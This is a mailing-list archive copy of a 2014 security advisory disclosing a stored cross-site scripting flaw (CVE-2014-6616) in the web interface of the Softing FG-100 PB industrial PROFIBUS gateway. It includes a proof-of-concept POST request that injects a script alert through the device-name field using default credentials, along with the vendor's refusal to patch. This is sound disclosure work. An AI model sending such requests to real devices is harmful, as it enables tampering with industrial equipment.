lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 5 Nov 2014 08:52:29 +0100
From: "Ingmar Rosenhagen" <ingmar.rosenhagen@...c.de>
To: <bugtraq@...urityfocus.com>
Subject: CVE-2014-6616 Softing FG-100 Webui XSS

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product:   Softing FG-100 PB
# Vendor:    Softing AG (www.softing.com)
# CVD ID:    CVE-2014-6616
# Subject:   XSS
# Risk:      High 
# Effect:    Remotely exploitable
# Author:    Johannes Klick
# 	       Daniel Marzin
# 	       Ingmar Rosenhagen
# Date:      05.11.2014 
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. This
device is used in industrial setups for making Profibus device available
via ethernet. Compass Security Deuschland GmbH [2] discovered a security
flaw in the webgui of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web gui does not properly encode output of user data in at least one
place.  Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code 

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O
RG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device   Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong>  Host Name
</strong></td><td>  <SCRIPT>alert("XSS")</SCRIPT>  </td><td>
</td></tr><tr><td><strong>  IP Address  </strong></td><td>  192.168.2.3
</td><td>     </td></tr><tr><td><strong>  Subnet Mask
</strong></td><td>  255.255.255.0  </td><td>
</td></tr><tr><td><strong>  Default Gateway  </strong></td><td>
</td><td>     </td></tr><tr><td><strong>  Maintenance IP Address
</strong></td><td>  192.168.212.231  </td><td>
</td></tr><tr><td><strong>  New network parameters will be used
</strong></td><td>  immediately
</td><td></td></tr></table><br></body></html>



Workaround / Fix:
-----------------
no patch is available

Timeline:
---------
Vendor Notified:    2014-09-15 
Vendor Response:    2014-10-24    
Vendor Status:	    Wont fix

References:
-----------
[1]:
http://industrial.softing.com/de/produkte/profibus-master-or-slave-configura
ble-single-channel-remote-interface.html
[2]:   http://www.csnc.de



Download attachment "smime.p7s" of type "application/pkcs7-signature" (5629 bytes)

Powered by blists - more mailing lists